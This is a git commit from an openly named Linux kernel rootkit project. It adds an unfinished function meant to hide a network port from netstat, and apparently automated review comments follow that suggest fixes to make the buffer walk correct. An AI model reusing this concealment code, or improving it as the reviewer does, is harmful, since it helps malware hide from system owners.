linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit 7928544127cc6a37822d5032a2f5bf6fec838c02
parent e1466a6380dc21f48816d4c0931cd5a7b8f12334
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sat, 12 Dec 2020 00:46:54 +0100

Further progress

Diffstat:
Msrc/sockhide.c | 8++++++++
1 file changed, 8 insertions(+), 0 deletions(-)

diff --git a/src/sockhide.c b/src/sockhide.c @@ -6,6 +6,8 @@ #define SIZE_PORT_COLON 6 +const char *netstat_sep = "\n"; + typedef unsigned short port_t; static port_t to_hide = 41821; @@ -40,10 +42,16 @@ unhook_show(void) enable_protection(); } +//Hide by removing the appropriate line and decreasing the sequence number accordingly static void hide_netstat(char *port, struct seq_file *seq) { + char *tok; + char *cur = seq->buf; + while((tok = strsep(&cur, netstat_sep))) { + DEBUG_INFO("Token is %s\n", seq->buf); + } } //seq includes all the info we need
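Review bot: `netstat_sep` in the first hunk is declared without `static`, so it has external linkage and the pointer itself stays writable, unlike the `static port_t to_hide` next to it. It is only passed as the delimiter argument to `strsep()`, so `static const char netstat_sep[] = "\n";` would keep it file-local and read-only. A one-line comment saying it is the line separator of the seq_file text would also help the reader.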
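Review bot: The `strsep()` loop added to `hide_netstat` treats `seq->buf` as a NUL-terminated string, but nothing in the hunk limits the scan to `seq->count`, and a seq_file buffer is presumably not guaranteed to be terminated at that offset, so the walk can read past the valid data in kernel memory. `strsep()` also overwrites each `"\n"` with `'\0'` in place, which alters the buffer later handed to the reader even though this loop only logs. The debug line passes `seq->buf` instead of `tok`, so every iteration prints the first line again; it should read `DEBUG_INFO("Token is %s\n", tok);`. Scanning with a length taken from `seq->count` (for example with `memchr`) avoids both the overrun and the in-place writes. The function is complete within the hunk, and `port` is not used yet.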